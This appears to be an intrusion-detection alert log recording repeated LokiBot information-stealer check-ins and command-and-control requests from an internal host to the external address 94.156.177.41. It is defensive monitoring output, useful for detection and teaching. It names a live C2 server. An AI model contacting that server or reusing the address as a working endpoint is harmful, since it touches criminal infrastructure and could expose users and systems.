2024-11-28T13:52:17.219155+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49718	94.156.177.41	80	TCP
2024-11-28T13:52:17.219155+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49718	94.156.177.41	80	TCP
2024-11-28T13:52:17.219155+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49718	94.156.177.41	80	TCP
2024-11-28T13:52:18.734775+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49718	94.156.177.41	80	TCP
2024-11-28T13:52:18.855201+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49718	TCP
2024-11-28T13:52:19.113785+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49721	94.156.177.41	80	TCP
2024-11-28T13:52:19.113785+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49721	94.156.177.41	80	TCP
2024-11-28T13:52:19.113785+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49721	94.156.177.41	80	TCP
2024-11-28T13:52:20.433012+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49721	94.156.177.41	80	TCP
2024-11-28T13:52:20.553024+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49721	TCP
2024-11-28T13:52:20.813749+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49724	94.156.177.41	80	TCP
2024-11-28T13:52:20.813749+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49724	94.156.177.41	80	TCP
2024-11-28T13:52:20.813749+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49724	94.156.177.41	80	TCP
2024-11-28T13:52:22.280016+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49724	94.156.177.41	80	TCP
2024-11-28T13:52:22.400000+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49724	TCP
2024-11-28T13:52:22.659042+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49726	94.156.177.41	80	TCP
2024-11-28T13:52:22.659042+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49726	94.156.177.41	80	TCP
2024-11-28T13:52:22.659042+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49726	94.156.177.41	80	TCP
2024-11-28T13:52:24.172204+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49726	94.156.177.41	80	TCP
2024-11-28T13:52:24.292204+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49726	TCP
2024-11-28T13:52:24.549789+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49727	94.156.177.41	80	TCP
2024-11-28T13:52:24.549789+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49727	94.156.177.41	80	TCP
2024-11-28T13:52:24.549789+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49727	94.156.177.41	80	TCP
2024-11-28T13:52:25.972126+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49727	94.156.177.41	80	TCP
2024-11-28T13:52:26.096508+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49727	TCP
2024-11-28T13:52:26.365633+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49733	94.156.177.41	80	TCP
2024-11-28T13:52:26.365633+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49733	94.156.177.41	80	TCP
2024-11-28T13:52:26.365633+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49733	94.156.177.41	80	TCP
2024-11-28T13:52:27.874307+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49733	94.156.177.41	80	TCP
2024-11-28T13:52:27.994452+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49733	TCP
2024-11-28T13:52:28.268944+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49739	94.156.177.41	80	TCP
2024-11-28T13:52:28.268944+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49739	94.156.177.41	80	TCP
2024-11-28T13:52:28.268944+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49739	94.156.177.41	80	TCP
2024-11-28T13:52:29.593699+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49739	94.156.177.41	80	TCP
2024-11-28T13:52:29.713774+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49739	TCP
2024-11-28T13:52:29.992184+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49745	94.156.177.41	80	TCP
2024-11-28T13:52:29.992184+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49745	94.156.177.41	80	TCP
2024-11-28T13:52:29.992184+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49745	94.156.177.41	80	TCP
2024-11-28T13:52:31.306295+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49745	94.156.177.41	80	TCP
2024-11-28T13:52:31.448629+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49745	TCP
2024-11-28T13:52:31.691657+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49750	94.156.177.41	80	TCP
2024-11-28T13:52:31.691657+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49750	94.156.177.41	80	TCP
2024-11-28T13:52:31.691657+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49750	94.156.177.41	80	TCP
2024-11-28T13:52:33.012667+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49750	94.156.177.41	80	TCP
2024-11-28T13:52:33.133068+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49750	TCP
2024-11-28T13:52:33.568487+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49751	94.156.177.41	80	TCP
2024-11-28T13:52:33.568487+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49751	94.156.177.41	80	TCP
2024-11-28T13:52:33.568487+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49751	94.156.177.41	80	TCP
2024-11-28T13:52:35.032116+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49751	94.156.177.41	80	TCP
2024-11-28T13:52:35.152257+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49751	TCP
2024-11-28T13:52:35.425401+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49757	94.156.177.41	80	TCP
2024-11-28T13:52:35.425401+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49757	94.156.177.41	80	TCP
2024-11-28T13:52:35.425401+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49757	94.156.177.41	80	TCP
2024-11-28T13:52:36.795234+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49757	94.156.177.41	80	TCP
2024-11-28T13:52:36.915264+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49757	TCP
2024-11-28T13:52:37.177766+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49762	94.156.177.41	80	TCP
2024-11-28T13:52:37.177766+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49762	94.156.177.41	80	TCP
2024-11-28T13:52:37.177766+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49762	94.156.177.41	80	TCP
2024-11-28T13:52:38.452387+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49762	94.156.177.41	80	TCP
2024-11-28T13:52:38.578089+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49762	TCP
2024-11-28T13:52:38.836045+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49768	94.156.177.41	80	TCP
2024-11-28T13:52:38.836045+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49768	94.156.177.41	80	TCP
2024-11-28T13:52:38.836045+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49768	94.156.177.41	80	TCP
2024-11-28T13:52:40.154060+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49768	94.156.177.41	80	TCP
2024-11-28T13:52:40.274183+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49768	TCP
2024-11-28T13:52:40.534388+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49771	94.156.177.41	80	TCP
2024-11-28T13:52:40.534388+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49771	94.156.177.41	80	TCP
2024-11-28T13:52:40.534388+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49771	94.156.177.41	80	TCP
2024-11-28T13:52:41.957950+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49771	94.156.177.41	80	TCP
2024-11-28T13:52:42.077928+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49771	TCP
2024-11-28T13:52:42.351772+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49775	94.156.177.41	80	TCP
2024-11-28T13:52:42.351772+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49775	94.156.177.41	80	TCP
2024-11-28T13:52:42.351772+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49775	94.156.177.41	80	TCP
2024-11-28T13:52:43.776505+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49775	94.156.177.41	80	TCP
2024-11-28T13:52:43.903449+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49775	TCP
2024-11-28T13:52:44.168555+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49781	94.156.177.41	80	TCP
2024-11-28T13:52:44.168555+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49781	94.156.177.41	80	TCP
2024-11-28T13:52:44.168555+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49781	94.156.177.41	80	TCP
2024-11-28T13:52:45.678418+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49781	94.156.177.41	80	TCP
2024-11-28T13:52:45.798995+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49781	TCP
2024-11-28T13:52:46.067495+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49785	94.156.177.41	80	TCP
2024-11-28T13:52:46.067495+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49785	94.156.177.41	80	TCP
2024-11-28T13:52:46.067495+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49785	94.156.177.41	80	TCP
2024-11-28T13:52:47.491806+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49785	94.156.177.41	80	TCP
2024-11-28T13:52:47.611903+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49785	TCP
2024-11-28T13:52:48.007586+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49791	94.156.177.41	80	TCP
2024-11-28T13:52:48.007586+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49791	94.156.177.41	80	TCP
2024-11-28T13:52:48.007586+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49791	94.156.177.41	80	TCP
2024-11-28T13:52:49.519282+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49791	94.156.177.41	80	TCP
2024-11-28T13:52:49.639320+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49791	TCP
2024-11-28T13:52:49.915881+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49797	94.156.177.41	80	TCP
2024-11-28T13:52:49.915881+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49797	94.156.177.41	80	TCP
2024-11-28T13:52:49.915881+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49797	94.156.177.41	80	TCP
2024-11-28T13:52:51.273383+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49797	94.156.177.41	80	TCP
2024-11-28T13:52:51.399558+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49797	TCP
2024-11-28T13:52:51.665645+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49801	94.156.177.41	80	TCP
2024-11-28T13:52:51.665645+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49801	94.156.177.41	80	TCP
2024-11-28T13:52:51.665645+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49801	94.156.177.41	80	TCP
2024-11-28T13:52:53.173277+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49801	94.156.177.41	80	TCP
2024-11-28T13:52:53.296816+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49801	TCP
2024-11-28T13:52:53.728329+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49806	94.156.177.41	80	TCP
2024-11-28T13:52:53.728329+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49806	94.156.177.41	80	TCP
2024-11-28T13:52:53.728329+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49806	94.156.177.41	80	TCP
2024-11-28T13:52:55.119928+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49806	94.156.177.41	80	TCP
2024-11-28T13:52:55.240089+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49806	TCP
2024-11-28T13:52:55.529063+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49811	94.156.177.41	80	TCP
2024-11-28T13:52:55.529063+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49811	94.156.177.41	80	TCP
2024-11-28T13:52:55.529063+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49811	94.156.177.41	80	TCP
2024-11-28T13:52:57.817541+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49811	94.156.177.41	80	TCP
2024-11-28T13:52:57.940552+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49811	TCP
2024-11-28T13:52:58.217591+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49818	94.156.177.41	80	TCP
2024-11-28T13:52:58.217591+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49818	94.156.177.41	80	TCP
2024-11-28T13:52:58.217591+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49818	94.156.177.41	80	TCP
2024-11-28T13:52:59.638447+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49818	94.156.177.41	80	TCP
2024-11-28T13:52:59.760272+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49818	TCP
2024-11-28T13:53:00.334231+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49824	94.156.177.41	80	TCP
2024-11-28T13:53:00.334231+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49824	94.156.177.41	80	TCP
2024-11-28T13:53:00.334231+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49824	94.156.177.41	80	TCP
2024-11-28T13:53:01.635518+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49824	94.156.177.41	80	TCP
2024-11-28T13:53:02.019879+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49829	94.156.177.41	80	TCP
2024-11-28T13:53:02.019879+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49829	94.156.177.41	80	TCP
2024-11-28T13:53:02.019879+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49829	94.156.177.41	80	TCP
2024-11-28T13:53:03.488071+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49829	94.156.177.41	80	TCP
2024-11-28T13:53:03.610341+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49829	TCP
2024-11-28T13:53:03.878356+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49833	94.156.177.41	80	TCP
2024-11-28T13:53:03.878356+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49833	94.156.177.41	80	TCP
2024-11-28T13:53:03.878356+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49833	94.156.177.41	80	TCP
2024-11-28T13:53:05.350722+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49833	94.156.177.41	80	TCP
2024-11-28T13:53:05.477095+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49833	TCP
2024-11-28T13:53:05.737923+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49837	94.156.177.41	80	TCP
2024-11-28T13:53:05.737923+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49837	94.156.177.41	80	TCP
2024-11-28T13:53:05.737923+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49837	94.156.177.41	80	TCP
2024-11-28T13:53:07.207826+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49837	94.156.177.41	80	TCP
2024-11-28T13:53:07.328140+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49837	TCP
2024-11-28T13:53:07.602577+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49840	94.156.177.41	80	TCP
2024-11-28T13:53:07.602577+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49840	94.156.177.41	80	TCP
2024-11-28T13:53:07.602577+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49840	94.156.177.41	80	TCP
2024-11-28T13:53:09.114132+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49840	94.156.177.41	80	TCP
2024-11-28T13:53:09.234121+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49840	TCP
2024-11-28T13:53:09.650403+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49845	94.156.177.41	80	TCP
2024-11-28T13:53:09.650403+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49845	94.156.177.41	80	TCP
2024-11-28T13:53:09.650403+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49845	94.156.177.41	80	TCP
2024-11-28T13:53:11.552901+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49845	94.156.177.41	80	TCP
2024-11-28T13:53:11.676387+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49845	TCP
2024-11-28T13:53:11.943752+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49851	94.156.177.41	80	TCP
2024-11-28T13:53:11.943752+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49851	94.156.177.41	80	TCP
2024-11-28T13:53:11.943752+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49851	94.156.177.41	80	TCP
2024-11-28T13:53:13.408228+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49851	94.156.177.41	80	TCP
2024-11-28T13:53:13.531949+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49851	TCP
2024-11-28T13:53:13.787378+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49857	94.156.177.41	80	TCP
2024-11-28T13:53:13.787378+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49857	94.156.177.41	80	TCP
2024-11-28T13:53:13.787378+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49857	94.156.177.41	80	TCP
2024-11-28T13:53:15.303148+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49857	94.156.177.41	80	TCP
2024-11-28T13:53:15.423126+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49857	TCP
2024-11-28T13:53:15.696851+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49862	94.156.177.41	80	TCP
2024-11-28T13:53:15.696851+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49862	94.156.177.41	80	TCP
2024-11-28T13:53:15.696851+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49862	94.156.177.41	80	TCP
2024-11-28T13:53:16.968396+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49862	94.156.177.41	80	TCP
2024-11-28T13:53:17.088676+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49862	TCP
2024-11-28T13:53:17.383644+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49867	94.156.177.41	80	TCP
2024-11-28T13:53:17.383644+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49867	94.156.177.41	80	TCP
2024-11-28T13:53:17.383644+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49867	94.156.177.41	80	TCP
2024-11-28T13:53:18.852419+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49867	94.156.177.41	80	TCP
2024-11-28T13:53:18.978807+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49867	TCP
2024-11-28T13:53:19.396128+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49871	94.156.177.41	80	TCP
2024-11-28T13:53:19.396128+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49871	94.156.177.41	80	TCP
2024-11-28T13:53:19.396128+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49871	94.156.177.41	80	TCP
2024-11-28T13:53:20.910013+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49871	94.156.177.41	80	TCP
2024-11-28T13:53:21.030551+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49871	TCP
2024-11-28T13:53:21.301001+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49877	94.156.177.41	80	TCP
2024-11-28T13:53:21.301001+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49877	94.156.177.41	80	TCP
2024-11-28T13:53:21.301001+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49877	94.156.177.41	80	TCP
2024-11-28T13:53:22.780609+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49877	94.156.177.41	80	TCP
2024-11-28T13:53:22.903350+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49877	TCP
2024-11-28T13:53:23.160248+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49882	94.156.177.41	80	TCP
2024-11-28T13:53:23.160248+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49882	94.156.177.41	80	TCP
2024-11-28T13:53:23.160248+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49882	94.156.177.41	80	TCP
2024-11-28T13:53:24.492850+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49882	94.156.177.41	80	TCP
2024-11-28T13:53:24.624213+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49882	TCP
2024-11-28T13:53:24.944914+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49888	94.156.177.41	80	TCP
2024-11-28T13:53:24.944914+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49888	94.156.177.41	80	TCP
2024-11-28T13:53:24.944914+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49888	94.156.177.41	80	TCP
2024-11-28T13:53:26.320757+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49888	94.156.177.41	80	TCP
2024-11-28T13:53:26.440822+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49888	TCP
2024-11-28T13:53:26.713138+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49893	94.156.177.41	80	TCP
2024-11-28T13:53:26.713138+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49893	94.156.177.41	80	TCP
2024-11-28T13:53:26.713138+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49893	94.156.177.41	80	TCP
2024-11-28T13:53:28.140273+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49893	94.156.177.41	80	TCP
2024-11-28T13:53:28.260281+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49893	TCP
2024-11-28T13:53:28.528184+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49897	94.156.177.41	80	TCP
2024-11-28T13:53:28.528184+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49897	94.156.177.41	80	TCP
2024-11-28T13:53:28.528184+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49897	94.156.177.41	80	TCP
2024-11-28T13:53:30.067360+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49897	94.156.177.41	80	TCP
2024-11-28T13:53:30.188659+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49897	TCP
2024-11-28T13:53:30.675910+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49902	94.156.177.41	80	TCP
2024-11-28T13:53:30.675910+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49902	94.156.177.41	80	TCP
2024-11-28T13:53:30.675910+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49902	94.156.177.41	80	TCP
2024-11-28T13:53:32.107303+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49902	94.156.177.41	80	TCP
2024-11-28T13:53:32.227331+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49902	TCP
2024-11-28T13:53:32.490598+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49908	94.156.177.41	80	TCP
2024-11-28T13:53:32.490598+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49908	94.156.177.41	80	TCP
2024-11-28T13:53:32.490598+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49908	94.156.177.41	80	TCP
2024-11-28T13:53:33.909974+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49908	94.156.177.41	80	TCP
2024-11-28T13:53:34.031647+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49908	TCP
2024-11-28T13:53:34.319262+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49913	94.156.177.41	80	TCP
